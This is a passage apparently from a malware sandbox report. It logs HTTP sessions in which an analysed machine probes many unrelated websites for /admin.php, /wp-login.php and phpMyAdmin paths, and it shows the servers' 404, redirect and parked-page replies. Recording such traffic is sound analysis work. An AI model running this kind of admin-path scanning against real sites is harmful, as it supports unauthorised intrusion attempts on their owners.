                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                149192.168.2.65748415.197.142.17380
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.634632111 CET228OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: malibusands.net
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.741043091 CET418INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:31 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Content-Length: 125
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Server: ip-10-123-122-53.ec2.internal
                                                                                                                                                                                                                                                                                                                X-Request-Id: 76ed3713-a443-421e-b0cc-7a65d45fe40c
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                150192.168.2.6574813.64.163.5080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.651313066 CET229OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: la-morada.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                151192.168.2.65756266.96.160.14480
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.792351961 CET232OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: jumpnsplashwear.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.917171001 CET1148INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:31 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Content-Length: 867
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Server: Apache/2
                                                                                                                                                                                                                                                                                                                Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                Age: 0
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                152192.168.2.65756566.96.160.14480
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.805632114 CET232OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: jumpnsplashwear.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.975301027 CET1188INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:31 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Content-Length: 867
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Server: Apache/2
                                                                                                                                                                                                                                                                                                                Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                Expires: Sat, 02 Dec 2023 01:09:41 GMT
                                                                                                                                                                                                                                                                                                                Age: 0
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                153192.168.2.65756664.71.33.3180
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.832237005 CET223OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mcsmk8.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.970040083 CET514INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:31 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                154192.168.2.6575483.64.163.5080
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.865008116 CET228OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: la-morada.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.055953026 CET346INHTTP/1.1 410 Gone
                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:31 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 39 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 6c 61 2d 6d 6f 72 61 64 61 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: 7<html>9 <head>49 <meta http-equiv='refresh' content='0; url=http://la-morada.com/' />a </head>8</html>0


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                155192.168.2.657549188.120.236.1880
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.892165899 CET226OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: eremina.net
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.113012075 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Fri, 01 Dec 2023 22:09:31 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.113023996 CET173INData Raw: 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73
                                                                                                                                                                                                                                                                                                                Data Ascii: been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                156192.168.2.65765666.96.160.14480
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:31.899224997 CET234OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: jumpnsplashwear.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:32.026714087 CET1148INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:31 GMT
                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                Content-Length: 867
                                                                                                                                                                                                                                                                                                                Connection: keep-alive
